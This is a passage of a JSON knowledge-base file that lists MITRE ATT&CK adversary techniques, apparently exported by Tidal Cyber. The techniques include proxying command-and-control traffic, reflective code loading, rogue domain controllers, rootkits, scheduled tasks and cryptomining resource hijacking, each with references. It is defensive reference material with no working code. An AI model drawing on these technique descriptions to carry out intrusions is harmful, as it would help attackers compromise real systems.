],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "bd677092-d197-4230-b94a-438cb24260fd",
"value": "Protocol Tunneling"
},
{
"description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://app.tidalcyber.com/software/b98d9fe7-9aa3-409a-bf5c-eadb01bac948), ZXProxy, and ZXPortMap. <sup>[[Trend Micro APT Attack Tools](https://app.tidalcyber.com/references/dac5cda3-97bc-4e38-b54f-554a75a18c5b)]</sup> Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "ba6a869a-c870-4be6-bc08-e078f0efdc3b",
"value": "Proxy"
},
{
"description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\n\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security.<sup>[[Wikipedia Windows Registry](https://app.tidalcyber.com/references/656f0ffd-33e0-40ef-bdf7-70758f855f18)]</sup> Information can easily be queried using the [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://app.tidalcyber.com/technique/58722f84-b119-45a8-8e29-0065688015ee) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "58722f84-b119-45a8-8e29-0065688015ee",
"value": "Query Registry"
},
{
"description": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, rather than creating a thread or process backed by a file path on disk (e.g., [Shared Modules](https://app.tidalcyber.com/technique/8941d1f4-d80c-4aaa-821a-a059c2a0f854)).\n\nReflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just stubs of fileless executable code (ex: position-independent shellcode).<sup>[[Introducing Donut](https://app.tidalcyber.com/references/8fd099c6-e002-44d0-8b7f-65f290a42c07)]</sup><sup>[[S1 Custom Shellcode Tool](https://app.tidalcyber.com/references/f49bfd00-48d5-4d84-a7b7-cb23fcdf861b)]</sup><sup>[[Stuart ELF Memory](https://app.tidalcyber.com/references/402745e1-a65a-4fa1-a86d-99b37221095c)]</sup><sup>[[00sec Droppers](https://app.tidalcyber.com/references/7569e79b-5a80-4f42-b467-8548cc9fc319)]</sup><sup>[[Mandiant BYOL](https://app.tidalcyber.com/references/445efe8b-659a-4023-afc7-aa7cd21ee5a1)]</sup> For example, the `Assembly.Load()` method executed by [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) may be abused to load raw code into the running process.<sup>[[Microsoft AssemblyLoad](https://app.tidalcyber.com/references/3d980d7a-7074-5812-9bb1-ca8e27e028bd)]</sup>\n\nReflective code injection is very similar to [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) except that the “injection” loads code into the process's own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.<sup>[[Stuart ELF Memory](https://app.tidalcyber.com/references/402745e1-a65a-4fa1-a86d-99b37221095c)]</sup><sup>[[00sec Droppers](https://app.tidalcyber.com/references/7569e79b-5a80-4f42-b467-8548cc9fc319)]</sup><sup>[[Intezer ACBackdoor](https://app.tidalcyber.com/references/e6cb833f-cf18-498b-a233-848853423412)]</sup><sup>[[S1 Old Rat New Tricks](https://app.tidalcyber.com/references/20ef3645-fb92-4e13-a5a8-99367869bcba)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "ef85800b-080d-4739-9f3b-91b61314a93e",
"value": "Reflective Code Loading"
},
{
"description": "An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.<sup>[[Symantec Living off the Land](https://app.tidalcyber.com/references/4bad4659-f501-4eb6-b3ca-0359e3ba824e)]</sup><sup>[[CrowdStrike 2015 Global Threat Report](https://app.tidalcyber.com/references/50d467da-286b-45f3-8d5a-e9d8632f7bf1)]</sup><sup>[[CrySyS Blog TeamSpy](https://app.tidalcyber.com/references/f21ea3e2-7983-44d2-b78f-80d84bbc4f52)]</sup>\n\nRemote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. It may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary-controlled system.\n\nAdversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.\n\nInstallation of many remote access tools may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://app.tidalcyber.com/technique/31c6dd3c-3eb2-46a9-ab85-9e8e145810a1)). Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome’s Remote Desktop).<sup>[[Google Chrome Remote Desktop](https://app.tidalcyber.com/references/70c87a07-38eb-53d2-8b63-013eb3ce62c8)]</sup><sup>[[Chrome Remote Desktop](https://app.tidalcyber.com/references/c1b2d0e9-2396-5080-aea3-58a99c027d20)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "acf828f4-7e7e-43e1-bf15-ceab42021430",
"value": "Remote Access Software"
},
{
"description": "Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to log in using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could log in to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).<sup>[[SSH Secure Shell](https://app.tidalcyber.com/references/ac5fc103-1946-488b-8af5-eda0636cbdd0)]</sup><sup>[[TechNet Remote Desktop Services](https://app.tidalcyber.com/references/b8fc1bdf-f602-4a9b-a51c-fa49e70f24cd)]</sup> They could also log in to accessible SaaS or IaaS services, such as those that federate their identities to the domain.\n\nLegitimate applications (such as [Software Deployment Tools](https://app.tidalcyber.com/technique/1bcf9fb5-6848-44d9-b394-ffbd3c357058) and other administrative programs) may utilize [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://app.tidalcyber.com/technique/af7afc1e-3374-4d1c-917b-c47c305274f5) to send the screen and control buffers and [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474) for secure file transfer.<sup>[[Remote Management MDM macOS](https://app.tidalcyber.com/references/e5f59848-7014-487d-9bae-bed81af1b72b)]</sup><sup>[[Kickstart Apple Remote Desktop commands](https://app.tidalcyber.com/references/f26542dd-aa61-4d2a-a05a-8f9674b49f82)]</sup><sup>[[Apple Remote Desktop Admin Guide 3.3](https://app.tidalcyber.com/references/c57c2bba-a398-4e68-b2a7-fddcf0740b61)]</sup> Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.<sup>[[FireEye 2019 Apple Remote Desktop](https://app.tidalcyber.com/references/bbc72952-988e-4c3c-ab5e-75b64e9e33f5)]</sup><sup>[[Lockboxx ARD 2019](https://app.tidalcyber.com/references/159f8495-5354-4b93-84cb-a25e56fcff3e)]</sup><sup>[[Kickstart Apple Remote Desktop commands](https://app.tidalcyber.com/references/f26542dd-aa61-4d2a-a05a-8f9674b49f82)]</sup>",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
}
],
"uuid": "30ef3f13-5e9b-4712-9adf-f0da4ef157a1",
"value": "Remote Services"
},
{
"description": "Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.\n\nAdversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://app.tidalcyber.com/technique/c992f340-645d-412a-b509-3cbaf94919b0) differs from use of [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).<sup>[[RDP Hijacking Medium](https://app.tidalcyber.com/references/0a615508-c155-4004-86b8-916bbfd8ae42)]</sup><sup>[[Breach Post-mortem SSH Hijack](https://app.tidalcyber.com/references/f1d15b92-8840-45ae-b23d-0cba20fc22cc)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
}
],
"uuid": "c992f340-645d-412a-b509-3cbaf94919b0",
"value": "Remote Service Session Hijacking"
},
{
"description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://app.tidalcyber.com/software/4ea12106-c0a1-4546-bb64-a1675d9f5dc7) or <code>net view</code> using [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc).\n\nAdversaries may also analyze data from local host files (ex: <code>C:\\Windows\\System32\\Drivers\\etc\\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://app.tidalcyber.com/software/45b51950-6190-4572-b1a2-7c69d865251e) cache entries) in order to discover the presence of remote systems in an environment.\n\nAdversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[CISA AR21-126A FIVEHANDS May 2021](https://app.tidalcyber.com/references/f98604dd-2881-4024-8e43-6f5f48c6c9fa)]</sup> \n",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "00a9a4d4-928d-4d95-be31-dfac6103991f",
"value": "Remote System Discovery"
},
{
"description": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.\n\nMobile devices may also be used to infect PCs with malware if connected via USB.<sup>[[Exploiting Smartphone USB ](https://app.tidalcyber.com/references/573796bd-4553-4ae1-884a-9af71b5de873)]</sup> This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.<sup>[[Windows Malware Infecting Android](https://app.tidalcyber.com/references/3733386a-14bd-44a6-8241-a10660ba25d9)]</sup><sup>[[iPhone Charging Cable Hack](https://app.tidalcyber.com/references/b8bb0bc5-e131-47b5-8c42-48cd3dc25250)]</sup> For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
},
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "6a7ab25e-49ed-4cd3-b199-5d80b728b416",
"value": "Replication Through Removable Media"
},
{
"description": "Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. \n\nOne common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.<sup>[[Kaspersky Lazarus Under The Hood Blog 2017](https://app.tidalcyber.com/references/a1e1ab6a-8db0-4593-95ec-78784607dfa0)]</sup> Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.<sup>[[CloudSploit - Unused AWS Regions](https://app.tidalcyber.com/references/7c237b73-233f-4fe3-b4a6-ce523fd82853)]</sup> Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.<sup>[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]</sup><sup>[[Trend Micro Exposed Docker APIs](https://app.tidalcyber.com/references/24ae5092-42ea-4c83-bdf7-c0e5026d9559)]</sup>\n\nAdditionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.<sup>[[Trend Micro War of Crypto Miners](https://app.tidalcyber.com/references/1ba47efe-35f8-4d52-95c7-65cdc829c8e5)]</sup>\n\nAdversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://app.tidalcyber.com/technique/e6c14a7b-1fb8-4557-83e7-7f5b89717311) campaigns and/or to seed malicious torrents.<sup>[[GoBotKR](https://app.tidalcyber.com/references/7d70675c-5520-4c81-8880-912ce918c4b5)]</sup> Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.<sup>[[Sysdig Proxyjacking](https://app.tidalcyber.com/references/26562be2-cab6-5867-9a43-d8a59c663596)]</sup>",
"meta": {
"platforms": [
"Containers",
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "d10c4a15-aeaa-4630-a7a3-3373c89a584f",
"value": "Resource Hijacking"
},
{
"description": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. <sup>[[DCShadow Blog](https://app.tidalcyber.com/references/37514816-b8b3-499f-842b-2d8cce9e140b)]</sup> Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\n\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. <sup>[[Adsecurity Mimikatz Guide](https://app.tidalcyber.com/references/b251ed65-a145-4053-9dc2-bf0dad83d76c)]</sup>\n\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). <sup>[[DCShadow Blog](https://app.tidalcyber.com/references/37514816-b8b3-499f-842b-2d8cce9e140b)]</sup> The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://app.tidalcyber.com/technique/dcb323f0-0fe6-4e26-9039-4f26f10cd3a5) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. <sup>[[DCShadow Blog](https://app.tidalcyber.com/references/37514816-b8b3-499f-842b-2d8cce9e140b)]</sup>",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "c5eb5b88-6c62-4900-9b14-c4d67d420002",
"value": "Rogue Domain Controller"
},
{
"description": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. <sup>[[Symantec Windows Rootkits](https://app.tidalcyber.com/references/5b8d9094-dabf-4c29-a95b-b90dbcf07382)]</sup> \n\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://app.tidalcyber.com/technique/4050dbda-5cb0-4bd6-8444-841e55611f3a). <sup>[[Wikipedia Rootkit](https://app.tidalcyber.com/references/7e877b6b-9873-48e2-b138-e02dcb5268ca)]</sup> Rootkits have been seen for Windows, Linux, and Mac OS X systems. <sup>[[CrowdStrike Linux Rootkit](https://app.tidalcyber.com/references/eb3590bf-ff12-4ccd-bf9d-cf8eacd82135)]</sup> <sup>[[BlackHat Mac OSX Rootkit](https://app.tidalcyber.com/references/e01a6d46-5b38-42df-bd46-3995d38bb60e)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "cf2b56f6-3ebd-48ec-b9d9-835397acef89",
"value": "Rootkit"
},
{
"description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.<sup>[[TechNet Task Scheduler Security](https://app.tidalcyber.com/references/3a6d08ba-d79d-46f7-917d-075a98c59228)]</sup>\n\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://app.tidalcyber.com/technique/4060ad55-7ff1-4127-acad-808b2bc77655), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.<sup>[[ProofPoint Serpent](https://app.tidalcyber.com/references/c2f7958b-f521-4133-9aeb-c5c8fae23e78)]</sup>",
"meta": {
"platforms": [
"Containers",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
},
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "0baf02af-ffaa-403f-9f0d-da51f463a1d8",
"value": "Scheduled Task/Job"
},
{
"description": "Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.\n\nWhen scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://app.tidalcyber.com/technique/89203cae-d3f1-4eef-9b5a-29042eb05d19) or [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88).",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
}
],
"uuid": "ea0557cd-94bc-48cf-9c3b-293c40986464",
"value": "Scheduled Transfer"
},
{
"description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.<sup>[[CopyFromScreen .NET](https://app.tidalcyber.com/references/b9733af4-ffb4-416e-884e-d51649aecbce)]</sup><sup>[[Antiquated Mac Malware](https://app.tidalcyber.com/references/165edb01-2681-45a3-b76b-4eb7dee5dab9)]</sup>\n",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "4462ce9d-0a5a-427d-8160-7b307b50cfbd",
"value": "Screen Capture"
},
{
"description": "Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.<sup>[[D3Secutrity CTI Feeds](https://app.tidalcyber.com/references/088f2cbd-cce1-477f-9ffb-319477d74b69)]</sup> Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.<sup>[[ZDNET Selling Data](https://app.tidalcyber.com/references/61d00ae2-5494-4c6c-8860-6826e701ade8)]</sup>\n\nAdversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "40e4133b-28c2-4da7-9a6a-7392ae87f1da",
"value": "Search Closed Sources"
},
{
"description": "Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.<sup>[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup><sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup><sup>[[Medium SSL Cert](https://app.tidalcyber.com/references/6502425f-3435-4162-8c96-9e10a789d362)]</sup><sup>[[SSLShopper Lookup](https://app.tidalcyber.com/references/a8dc493f-2021-48fa-8f28-afd13756b789)]</sup><sup>[[DigitalShadows CDN](https://app.tidalcyber.com/references/183a070f-6c8c-46e3-915b-6edc58bb5e91)]</sup><sup>[[Shodan](https://app.tidalcyber.com/references/a142aceb-3ef5-4231-8771-bb3b2dae9acd)]</sup>\n\nAdversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "cf79ad1b-a82b-486b-88ad-e93bfc1c7439",
"value": "Search Open Technical Databases"
},
{
"description": "Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, news sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.<sup>[[Cyware Social Media](https://app.tidalcyber.com/references/e6136a63-81fe-4363-8d98-f7d1e85a0f2b)]</sup><sup>[[SecurityTrails Google Hacking](https://app.tidalcyber.com/references/3e7fdeaf-24a7-4cb5-8ed3-6057c9035303)]</sup><sup>[[ExploitDB GoogleHacking](https://app.tidalcyber.com/references/29714b88-a1ff-4684-a3b0-35c3a2c78947)]</sup>\n\nAdversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "f2d216e3-43d6-4a2e-aa5b-d6be78d018b6",
"value": "Search Open Websites/Domains"
},
{
"description": "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://app.tidalcyber.com/technique/2eee984c-ea00-4284-b3eb-fd0c603a5a80)). These sites may also have details highlighting business operations and relationships.<sup>[[Comparitech Leak](https://app.tidalcyber.com/references/fa0eac56-45ea-4628-88cf-b843874b4a4d)]</sup>\n\nAdversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "c55c0462-d59f-4bd8-9728-05cf711917b0",
"value": "Search Victim-Owned Websites"
},
{
"description": "Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. \n\nAdversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. [Resource Hijacking](https://app.tidalcyber.com/technique/d10c4a15-aeaa-4630-a7a3-3373c89a584f)).<sup>[[Cado Security Denonia](https://app.tidalcyber.com/references/584e7ace-ef33-423b-9801-4728a447cb34)]</sup> Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the `IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission in Google Cloud to add [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1) to a serverless cloud function, which may then be able to perform actions the original user cannot.<sup>[[Rhino Security Labs AWS Privilege Escalation](https://app.tidalcyber.com/references/693e5783-4aa1-40ce-8080-cec01c3e7b59)]</sup><sup>[[Rhingo Security Labs GCP Privilege Escalation](https://app.tidalcyber.com/references/55373476-1cbe-49f5-aecb-69d60b336d38)]</sup>\n\nServerless functions can also 